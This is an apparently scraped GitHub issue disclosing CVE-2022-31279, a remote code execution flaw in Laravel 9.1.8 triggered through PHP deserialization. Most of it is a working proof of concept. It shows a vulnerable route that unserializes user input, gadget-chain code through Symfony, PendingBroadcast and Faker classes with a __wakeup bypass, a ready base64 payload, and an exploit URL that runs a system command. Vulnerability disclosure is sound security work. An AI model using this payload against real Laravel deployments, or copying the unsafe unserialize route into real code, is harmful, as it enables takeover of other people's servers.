Headline
CVE-2022-31279: Laravel 9.1.8 POP chain3 · Issue #3 · 1nhann/vulns
Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution (RCE) via an unserialized pop chain in __destruct in Illuminate\Broadcasting\PendingBroadcast.php and __call in Faker\Generator.php.
Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution via an unserialize pop chain in (1) __destruct in Illuminate\Broadcasting\PendingBroadcast.php .(2) __call in Faker\Generator.php . This poc bypasses __wakeup in Faker\Generator.php : https://inhann.top/2022/05/17/bypass_wakeup/
<?php
use Illuminate\Support\Facades\Route;
/* |--------------------------------------------------------------------------
| Web Routes |
|---|
| Here is where you can register web routes for your application. These |
| routes are loaded by the RouteServiceProvider within a group which |
| contains the “web” middleware group. Now create something great! |
*/
Route::get('/’, function (\Illuminate\Http\Request $request) { // return view(‘welcome’); $ser = base64_decode($request->input(“ser”)); unserialize($ser); return "ok"; });
<?php namespace Faker{ class Generator{ protected $providers = []; protected $formatters = []; function __construct() { $this->formatter = "dispatch"; $this->formatters = 9999; }
}
}
namespace Illuminate\Broadcasting{ class PendingBroadcast { public function __construct() { $this->event = "calc.exe"; $this->events = new \Faker\Generator(); } } }
namespace Symfony\Component\Mime\Part{ abstract class AbstractPart { private $headers = null; } class SMimePart extends AbstractPart{ protected $_headers; public $inhann; function __construct(){ $this->_headers = [“dispatch"=>"system”]; $this->inhann = new \Illuminate\Broadcasting\PendingBroadcast(); } } }
namespace{ $a = new \Symfony\Component\Mime\Part\SMimePart(); $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/","\\1\\3\\2\\4",serialize($a)); echo base64_encode(str_replace("i:9999","R:2",$ser)); }
TzozNzoiU3ltZm9ueVxDb21wb25lbnRcTWltZVxQYXJ0XFNNaW1lUGFydCI6Mzp7czo0OToiAFN5bWZvbnlcQ29tcG9uZW50XE1pbWVcUGFydFxBYnN0cmFjdFBhcnQAaGVhZGVycyI7TjtzOjExOiIAKgBfaGVhZGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fXM6NjoiaW5oYW5uIjtPOjQwOiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xQZW5kaW5nQnJvYWRjYXN0IjoyOntzOjU6ImV2ZW50IjtzOjg6ImNhbGMuZXhlIjtzOjY6ImV2ZW50cyI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjozOntzOjEyOiIAKgBwcm92aWRlcnMiO2E6MDp7fXM6MTM6IgAqAGZvcm1hdHRlcnMiO1I6MjtzOjk6ImZvcm1hdHRlciI7czo4OiJkaXNwYXRjaCI7fX19
http://127.0.0.1/?ser=TzozNzoiU3ltZm9ueVxDb21wb25lbnRcTWltZVxQYXJ0XFNNaW1lUGFydCI6Mzp7czo0OToiAFN5bWZvbnlcQ29tcG9uZW50XE1pbWVcUGFydFxBYnN0cmFjdFBhcnQAaGVhZGVycyI7TjtzOjExOiIAKgBfaGVhZGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fXM6NjoiaW5oYW5uIjtPOjQwOiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xQZW5kaW5nQnJvYWRjYXN0IjoyOntzOjU6ImV2ZW50IjtzOjg6ImNhbGMuZXhlIjtzOjY6ImV2ZW50cyI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjozOntzOjEyOiIAKgBwcm92aWRlcnMiO2E6MDp7fXM6MTM6IgAqAGZvcm1hdHRlcnMiO1I6MjtzOjk6ImZvcm1hdHRlciI7czo4OiJkaXNwYXRjaCI7fX19
Related news
Laravel 9.1.8, when processing attacker-controlled data for deserialization, allows Remote Code Execution (RCE) via an unserialized pop chain in __destruct in Illuminate\Broadcasting\PendingBroadcast.php and __call in Faker\Generator.php.